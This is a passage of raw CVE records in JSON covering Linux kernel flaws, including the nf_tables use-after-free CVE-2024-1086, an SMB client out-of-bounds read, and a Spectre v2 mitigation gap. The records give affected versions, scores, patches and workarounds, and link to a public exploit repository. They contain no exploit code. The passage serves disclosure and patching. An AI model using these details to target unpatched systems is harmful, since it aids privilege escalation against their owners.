"url": "http://www.openwall.com/lists/oss-security/2023/11/05/3" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1073", "datePublished": "2023-03-27T00:00:00", "dateReserved": "2023-02-27T00:00:00", "dateUpdated": "2024-08-02T05:32:46.333Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-1086
Vulnerability from cvelistv5
Published
2024-01-31 12:14
Modified
2024-08-01 18:26
Severity ?
EPSS score ?
Summary
Use-after-free in Linux kernel's netfilter: nf_tables component
References
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:o:linux:linux_kernel:3.15:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "linux_kernel", "vendor": "linux", "versions": [ { "lessThan": "6.8", "status": "affected", "version": "3.15", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2024-1086", "options": [ { "Exploitation": "active" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-06-13T14:20:47.271139Z", "version": "2.0.3" }, "type": "ssvc" } }, { "other": { "content": { "dateAdded": "2024-05-30", "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2024-1086" }, "type": "kev" } } ], "providerMetadata": { "dateUpdated": "2024-06-13T14:20:53.447Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T18:26:30.467Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/" }, { "tags": [ "x_transferred" ], "url": "https://github.com/Notselwyn/CVE-2024-1086" }, { "tags": [ "x_transferred" ], "url": "https://news.ycombinator.com/item?id=39828424" }, { "tags": [ "x_transferred" ], "url": "https://pwning.tech/nftables/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/15/2" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/10/23" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/10/22" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/14/1" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/17/5" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240614-0009/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.8", "status": "affected", "version": "3.15", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Notselwyn" } ], "datePublic": "2024-01-24T19:02:39+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.\n\nWe recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-31T12:14:34.073Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660" }, { "url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/" }, { "url": "https://github.com/Notselwyn/CVE-2024-1086" }, { "url": "https://news.ycombinator.com/item?id=39828424" }, { "url": "https://pwning.tech/nftables/" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/15/2" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/10/23" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/10/22" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/14/1" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/17/5" }, { "url": "https://security.netapp.com/advisory/ntap-20240614-0009/" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2024-1086", "datePublished": "2024-01-31T12:14:34.073Z", "dateReserved": "2024-01-30T20:04:09.704Z", "dateUpdated": "2024-08-01T18:26:30.467Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6610
Vulnerability from cvelistv5
Published
2023-12-08 16:58
Modified
2024-09-13 23:30
Severity ?
EPSS score ?
Summary
Kernel: oob access in smb2_dump_detail
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:0723 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0724 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0725 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0881 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0897 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1248 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1404 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2094 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-6610 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.kernel.org/show_bug.cgi?id=218219 | ||
https://bugzilla.redhat.com/show_bug.cgi?id=2253614 | issue-tracking, x_refsource_REDHAT |
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:35:14.744Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0724", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0724" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:0881", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0881" }, { "name": "RHSA-2024:0897", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0897" }, { "name": "RHSA-2024:1248", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1248" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:2094", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2094" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6610" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.kernel.org/show_bug.cgi?id=218219" }, { "name": "RHBZ#2253614", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253614" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.18.1.rt7.320.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.18.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.91.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.51.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.24.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.24.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::realtime", "cpe:/a:redhat:rhel_eus:9.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.rt14.337.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.91.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-22", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-11", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch6-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-407", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-19", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-proxy-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.0.0-479", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-7", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/eventrouter-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.4.0-247", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/fluentd-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-5", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/log-file-metric-exporter-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.1.0-227", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-curator5-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.1-470", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-loki-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v2.9.6-14", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-view-plugin-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-2", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-24", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-10", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/lokistack-gateway-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-525", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/opa-openshift-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-224", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/vector-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.28.1-56", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-12-04T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "An out-of-bounds read vulnerability was found in smb2_dump_detail in fs/smb/client/smb2ops.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "Out-of-bounds Read", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T23:30:35.339Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0724", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0724" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:0881", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0881" }, { "name": "RHSA-2024:0897", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0897" }, { "name": "RHSA-2024:1248", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1248" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:2094", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2094" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6610" }, { "url": "https://bugzilla.kernel.org/show_bug.cgi?id=218219" }, { "name": "RHBZ#2253614", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253614" } ], "timeline": [ { "lang": "en", "time": "2023-12-08T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-12-04T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: oob access in smb2_dump_detail", "workarounds": [ { "lang": "en", "value": "To mitigate this issue, prevent module cifs from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically." } ], "x_redhatCweChain": "CWE-125: Out-of-bounds Read" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6610", "datePublished": "2023-12-08T16:58:09.963Z", "dateReserved": "2023-12-08T08:25:42.667Z", "dateUpdated": "2024-09-13T23:30:35.339Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1252
Vulnerability from cvelistv5
Published
2023-03-23 00:00
Modified
2024-08-02 05:40
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in the Linux kernel’s Ext4 File System in how a user triggers several file operations simultaneously with the overlay FS usage. This flaw allows a local user to crash or potentially escalate their privileges on the system. Only if patch 9a2544037600 ("ovl: fix use after free in struct ovl_aio_req") not applied yet, the kernel could be affected.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:40:59.849Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/lkml/20211115165433.449951285%40linuxfoundation.org/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230505-0005/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel 5.16-rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in the Linux kernel\u2019s Ext4 File System in how a user triggers several file operations simultaneously with the overlay FS usage. This flaw allows a local user to crash or potentially escalate their privileges on the system. Only if patch 9a2544037600 (\"ovl: fix use after free in struct ovl_aio_req\") not applied yet, the kernel could be affected." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-05T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/lkml/20211115165433.449951285%40linuxfoundation.org/" }, { "url": "https://security.netapp.com/advisory/ntap-20230505-0005/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1252", "datePublished": "2023-03-23T00:00:00", "dateReserved": "2023-03-07T00:00:00", "dateUpdated": "2024-08-02T05:40:59.849Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1998
Vulnerability from cvelistv5
Published
2023-04-21 14:51
Modified
2024-08-02 06:05
Severity ?
EPSS score ?
Summary
Spectre v2 SMT mitigations problem in Linux kernel
References
Impacted products
▼ | Vendor | Product |
---|---|---|
Linux | Linux Kernel |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:05:27.106Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/google/security-research/security/advisories/GHSA-mj4w-6495-6crx" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://git.kernel.org/", "defaultStatus": "unaffected", "modules": [ "x86/speculation" ], "packageName": "kernel", "platforms": [ "Linux" ], "product": "Linux Kernel", "repo": "https://git.kernel.org/", "vendor": "Linux", "versions": [ { "lessThan": "6.3", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "datePublic": "2023-04-13T16:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cp\u003eThe Linux kernel allows userspace processes to enable mitigations by calling prctl with PR_SET_SPECULATION_CTRL which disables the speculation feature as well as by using seccomp. We had noticed that on VMs of at least one major cloud provider, the kernel still left the victim process exposed to attacks in some cases even after enabling the spectre-BTI mitigation with prctl. The same behavior can be observed on a bare-metal machine when forcing the mitigation to IBRS on boot command line.\u003c/p\u003e\u003cp\u003eThis happened because when plain IBRS was enabled (not enhanced IBRS), the kernel had some logic that determined that STIBP was not needed. The IBRS bit implicitly protects against cross-thread branch target injection. However, with legacy IBRS, the IBRS bit was cleared on returning to userspace, due to performance reasons, which disabled the implicit STIBP and left userspace threads vulnerable to cross-thread branch target injection against which STIBP protects.\u003c/p\u003e\u003cbr\u003e" } ], "value": "The Linux kernel allows userspace processes to enable mitigations by calling prctl with PR_SET_SPECULATION_CTRL which disables the speculation feature as well as by using seccomp. We had noticed that on VMs of at least one major cloud provider, the kernel still left the victim process exposed to attacks in some cases even after enabling the spectre-BTI mitigation with prctl. The same behavior can be observed on a bare-metal machine when forcing the mitigation to IBRS on boot command line.\n\nThis happened because when plain IBRS was enabled (not enhanced IBRS), the kernel had some logic that determined that STIBP was not needed. The IBRS bit implicitly protects against cross-thread branch target injection. However, with legacy IBRS, the IBRS bit was cleared on returning to 